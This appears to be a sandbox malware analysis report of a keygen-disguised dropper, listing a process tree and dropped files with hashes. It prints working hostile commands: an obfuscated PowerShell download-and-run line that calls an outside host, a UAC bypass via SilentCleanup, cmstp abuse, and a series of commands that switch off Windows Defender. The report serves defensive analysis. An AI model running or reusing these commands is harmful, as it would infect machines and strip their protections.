                • C:\Users\Public\ejf.exe
                  "C:\Users\Public\ejf.exe"
                  Executes dropped EXE
                  Suspicious use of SetThreadContext
                  Suspicious behavior: MapViewOfSection
                  Suspicious use of SetWindowsHookEx
                  PID:5096
                  • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                    "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                    Executes dropped EXE
                    Suspicious use of SetThreadContext
                    Suspicious behavior: MapViewOfSection
                    Suspicious use of SetWindowsHookEx
                    PID:1796
                    • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
                      "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
                      Executes dropped EXE
                      Suspicious use of NtSetInformationThreadHideFromDebugger
                      PID:5116
                  • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                    "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                    Executes dropped EXE
                    Suspicious use of SetThreadContext
                    Suspicious behavior: MapViewOfSection
                    Suspicious use of SetWindowsHookEx
                    PID:4240
                    • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
                      "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
                      Executes dropped EXE
                      Loads dropped DLL
                      Suspicious use of NtSetInformationThreadHideFromDebugger
                      Checks processor information in registry
                      PID:4404
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c taskkill /pid 4404 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\386531223269341\\* & exit
                        PID:3440
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 4404
                          Kills process with taskkill
                          PID:804
                  • C:\Users\Public\ejf.exe
                    "C:\Users\Public\ejf.exe"
                    Executes dropped EXE
                    Loads dropped DLL
                    Checks whether UAC is enabled
                    Drops desktop.ini file(s)
                    Maps connected drives based on registry
                    Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:4236
                    • C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
                      "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      Suspicious behavior: EnumeratesProcesses
                      PID:4244
                      • C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
                        "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
                        Executes dropped EXE
                        PID:3132
                      • C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe
                        "C:\Users\Admin\AppData\Local\Temp\hGSBLC0mMB.exe"
                        Executes dropped EXE
                        PID:552
                    • C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe
                      "C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe"
                      Executes dropped EXE
                      Adds Run key to start application
                      Suspicious use of SetThreadContext
                      Modifies system certificate store
                      PID:4504
                      • C:\Windows\SysWOW64\svchost.exe
                        "C:\Windows\System32\svchost.exe"
                        PID:4448
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
                          PID:5560
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            Modifies registry key
                            PID:4480
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            Modifies registry key
                            PID:5584
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                            PID:4672
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            Modifies registry key
                            PID:5356
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cKIeetso.bat" "
                          PID:5216
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        PID:5056
                    • C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
                      "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      Suspicious behavior: EnumeratesProcesses
                      PID:4660
                      • C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
                        "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
                        Executes dropped EXE
                        PID:2788
                      • C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe
                        "C:\Users\Admin\AppData\Local\Temp\BKqzN9zoCZ.exe"
                        Executes dropped EXE
                        Suspicious behavior: EnumeratesProcesses
                        Suspicious use of SetWindowsHookEx
                        PID:496
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\yfny2ejf.inf
                          PID:1096
                    • C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe
                      "C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"
                      Executes dropped EXE
                      Suspicious use of SetThreadContext
                      PID:4380
                      • C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe
                        "C:\Users\Admin\AppData\Local\Temp\MYbv6sblhd.exe"
                        Executes dropped EXE
                        Windows security modification
                        PID:1772
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" Get-MpPreference -verbose
                          PID:2920
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\ejf.exe"
                      PID:2572
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        Delays execution with timeout.exe
                        PID:4984
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              PID:3992
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                Maps connected drives based on registry
                Suspicious use of NtSetInformationThreadHideFromDebugger
                Suspicious behavior: EnumeratesProcesses
                PID:4668
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    PID:3904
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c start C:\Windows\temp\nynibecq.exe
      PID:3240
      • C:\Windows\temp\nynibecq.exe
        C:\Windows\temp\nynibecq.exe
        Executes dropped EXE
        PID:3964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          PID:4316
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
          PID:3016
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
          PID:4480
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
          PID:4664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
          PID:5104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
          PID:1896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
          PID:3828
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
          PID:4912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
          PID:5168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
          PID:5260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
          PID:5416
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
          PID:5504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
          PID:5620
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cmstp.exe /F
      Kills process with taskkill
      PID:2444
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c start C:\Windows\temp\2eurzuuj.exe
      PID:5476
      • C:\Windows\temp\2eurzuuj.exe
        C:\Windows\temp\2eurzuuj.exe
        Executes dropped EXE
        PID:5848
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          PID:2968
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
          PID:5704
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
          PID:5724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
          PID:6060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
          PID:5608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
          PID:5240
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
          PID:5132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
          PID:5688
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
          PID:5380
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
          PID:5904
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
          PID:4168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
          PID:6020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
          PID:6196
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cmstp.exe /F
      Kills process with taskkill
      PID:3084

Network

MITRE ATT&CK Matrix

Replay Monitor

00:00 00:00

Downloads

  • C:\ProgramData\mozglue.dll
  • C:\ProgramData\nss3.dll
  • C:\ProgramData\nss3.dll
  • C:\ProgramData\sqlite3.dll
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
  • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
  • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
  • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKqzN9zoCZ.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MYbv6sblhd.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RxfEjqsctc.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a0k7SvAzhM.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fYDz9wNnYe.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hGSBLC0mMB.exe.log
  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    MD5

    b751492c41c6f3173d3b6f31c1b9b4eb

    SHA1

    abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

    SHA256

    ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

    SHA512

    afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\VHMGP9BO.cookie
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    9da8cb615d8f21b1899bfa25a4bf350b

    SHA1

    ba9402a68b0408113647264b5627e159c57252ec

    SHA256

    6a617c0c28868cda6c0e5c2a95cbf87616327315b48730402da8b451439a9867

    SHA512

    7cf3df514cd0d4b3c291a42d54d0d27395cce5acf3c01e5fa4eede6394f51836505caba6c795b17b1974fd240950baddde467215ab857d3970b62a13e52d6223

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    9da8cb615d8f21b1899bfa25a4bf350b

    SHA1

    ba9402a68b0408113647264b5627e159c57252ec

    SHA256

    6a617c0c28868cda6c0e5c2a95cbf87616327315b48730402da8b451439a9867

    SHA512

    7cf3df514cd0d4b3c291a42d54d0d27395cce5acf3c01e5fa4eede6394f51836505caba6c795b17b1974fd240950baddde467215ab857d3970b62a13e52d6223

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  • C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
  • C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
  • C:\Users\Admin\AppData\Local\Temp\333u357995k.exe
  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    MD5

    89158e00639d9ef6ee9337b4f19e74f4

    SHA1

    dc0f6e9025c284b3071dbfc6f1a8b8c0c639fce8

    SHA256

    9f46c479aacf5bb3810ab29c4f2950c34902aaf864bccd844f54d121a75d0b1d

    SHA512

    c23832cd017aa36dca87308aa0cbc5a3c710e34ba46bd5f689031740d235537c9d226b1de57bcc8823236959561ada368789a6cf5a49a4cbe7ee1781af366add

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exe
    MD5

    89158e00639d9ef6ee9337b4f19e74f4

    SHA1

    dc0f6e9025c284b3071dbfc6f1a8b8c0c639fce8

    SHA256

    9f46c479aacf5bb3810ab29c4f2950c34902aaf864bccd844f54d121a75d0b1d

    SHA512

    c23832cd017aa36dca87308aa0cbc5a3c710e34ba46bd5f689031740d235537c9d226b1de57bcc8823236959561ada368789a6cf5a49a4cbe7ee1781af366add

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
    MD5

    347d7700eb4a4537df6bb7492ca21702

    SHA1

    983189dab4b523e19f8efd35eee4d7d43d84aca2

    SHA256

    a9963808a1a358d6ee26ab88bdab4add50512de1a863aa79937815444ee64da8

    SHA512

    5efb1bce5b5fe74c886126c7bf3627628842a73d31550aee61b71e462b0cc4256b07ae2dc8c207917c5e134c15b8b1d5f3bbbd76724a9b12188f32ba48c25ac9

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
    MD5

    347d7700eb4a4537df6bb7492ca21702

    SHA1

    983189dab4b523e19f8efd35eee4d7d43d84aca2

    SHA256

    a9963808a1a358d6ee26ab88bdab4add50512de1a863aa79937815444ee64da8

    SHA512

    5efb1bce5b5fe74c886126c7bf3627628842a73d31550aee61b71e462b0cc4256b07ae2dc8c207917c5e134c15b8b1d5f3bbbd76724a9b12188f32ba48c25ac9

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\bb.exe
    MD5

    347d7700eb4a4537df6bb7492ca21702

    SHA1

    983189dab4b523e19f8efd35eee4d7d43d84aca2

    SHA256

    a9963808a1a358d6ee26ab88bdab4add50512de1a863aa79937815444ee64da8

    SHA512

    5efb1bce5b5fe74c886126c7bf3627628842a73d31550aee61b71e462b0cc4256b07ae2dc8c207917c5e134c15b8b1d5f3bbbd76724a9b12188f32ba48c25ac9

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\ereds.exe
    MD5

    767d99623569552123fb197eead28fca

    SHA1

    9f1016e3cce207c6ed707482104ea3ee9034accf

    SHA256

    83340560b73a536090d42341628d6d1f966f437dc8462a6d69f993dc7f17e145

    SHA512

    897fa44f7b939557434155df170694269d1b9d575f28dff1d930a6b98b04d96fc002ab1921a8723ded5ae4e009dde3d18ce5d819ff1f471f14cadaa39386f36c

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\ereds.exe
    MD5

    767d99623569552123fb197eead28fca

    SHA1

    9f1016e3cce207c6ed707482104ea3ee9034accf

    SHA256

    83340560b73a536090d42341628d6d1f966f437dc8462a6d69f993dc7f17e145

    SHA512

    897fa44f7b939557434155df170694269d1b9d575f28dff1d930a6b98b04d96fc002ab1921a8723ded5ae4e009dde3d18ce5d819ff1f471f14cadaa39386f36c

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe
    MD5

    4d50c264c22fd1047a8a3bd8b77b3bd1

    SHA1

    007d3a3b116834e1ef181397dde48108a660a380

    SHA256

    2f6c41716ddd86a9316a24074747286e9e1a033780b82ef3ce47f5d821655c45

    SHA512

    8f8c56e8c0a1c4f9b10332139b48e4709890c29073dd47e67f460e8f9453150b89947a4fe83974474861a47c99b2749fecc262fb7ffb080854b0e7724078b5a7

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\key.exe
    MD5

    4d50c264c22fd1047a8a3bd8b77b3bd1

    SHA1

    007d3a3b116834e1ef181397dde48108a660a380

    SHA256

    2f6c41716ddd86a9316a24074747286e9e1a033780b82ef3ce47f5d821655c45

    SHA512

    8f8c56e8c0a1c4f9b10332139b48e4709890c29073dd47e67f460e8f9453150b89947a4fe83974474861a47c99b2749fecc262fb7ffb080854b0e7724078b5a7

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\puttty.exe
    MD5

    8a40892abb22c314d13d30923f9b96c8

    SHA1

    ff6807c0e8454101746b57fd8cc22105b6d98100

    SHA256

    ee59ca12eb0a166e08f2fae9f6bb818496b9172b4bc11d22b47d184f72b6aae8

    SHA512

    8a2bfd6e49262f0a68a5ab7c7385d30a2f2ed150f641d00b8bf1c9817d2d23151a6b1ac13c2aece4c93fee78d6c3dc3480cc70b67b9a344063891f3e0f4f5f5b

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\puttty.exe
    MD5

    8a40892abb22c314d13d30923f9b96c8

    SHA1

    ff6807c0e8454101746b57fd8cc22105b6d98100

    SHA256

    ee59ca12eb0a166e08f2fae9f6bb818496b9172b4bc11d22b47d184f72b6aae8

    SHA512

    8a2bfd6e49262f0a68a5ab7c7385d30a2f2ed150f641d00b8bf1c9817d2d23151a6b1ac13c2aece4c93fee78d6c3dc3480cc70b67b9a344063891f3e0f4f5f5b

  • C:\Users\Admin\AppData\Local\Temp\6D65.tmp\start.bat
    MD5

    f96458f7f2a09565f4b715dba1279633

    SHA1

    86e808b7a0d46dcce31c2257f694d57f1391da9e

    SHA256

    e44b8c63fd1af7398baf56956f1bb67ee6da398df848451efaef980ad36fbc79

    SHA512

    8da2ce25b5cbf12bb150d7078dbb51423f90039de5bdc05c7d652518af992a6607f989615ae08d710d6f7e37913b9bfc7b5e218d8c530e0aa377dc07c397cd78

  • C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
  • C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
  • C:\Users\Admin\AppData\Local\Temp\9119gy3q5_1.exe
  • C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe
  • C:\Users\Admin\AppData\Local\Temp\9Dq25VPs74.exe
  • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\Keygen.exe
    MD5

    ea2c982c12fbec5f145948b658da1691

    SHA1

    d17baf0b8f782934da0c686f2e87f019643be458

    SHA256

    eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

    SHA512

    1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

  • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\Keygen.exe
    MD5

    ea2c982c12fbec5f145948b658da1691

    SHA1

    d17baf0b8f782934da0c686f2e87f019643be458

    SHA256

    eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

    SHA512

    1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

  • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b.hta
    MD5

    5bbba448146acc4530b38017be801e2e

    SHA1

    8c553a7d3492800b630fc7d65a041ae2d466fb36

    SHA256

    96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

    SHA512

    48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

  • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\b1.hta
    MD5

    c57770e25dd4e35b027ed001d9f804c2

    SHA1

    408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

    SHA256

    bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

    SHA512

    ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

  • C:\Users\Admin\AppData\Local\Temp\B1F0.tmp\ba.hta
    MD5

    b762ca68ba25be53780beb13939870b2

    SHA1

    1780ee68efd4e26ce1639c6839c7d969f0137bfd

    SHA256

    c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

    SHA512

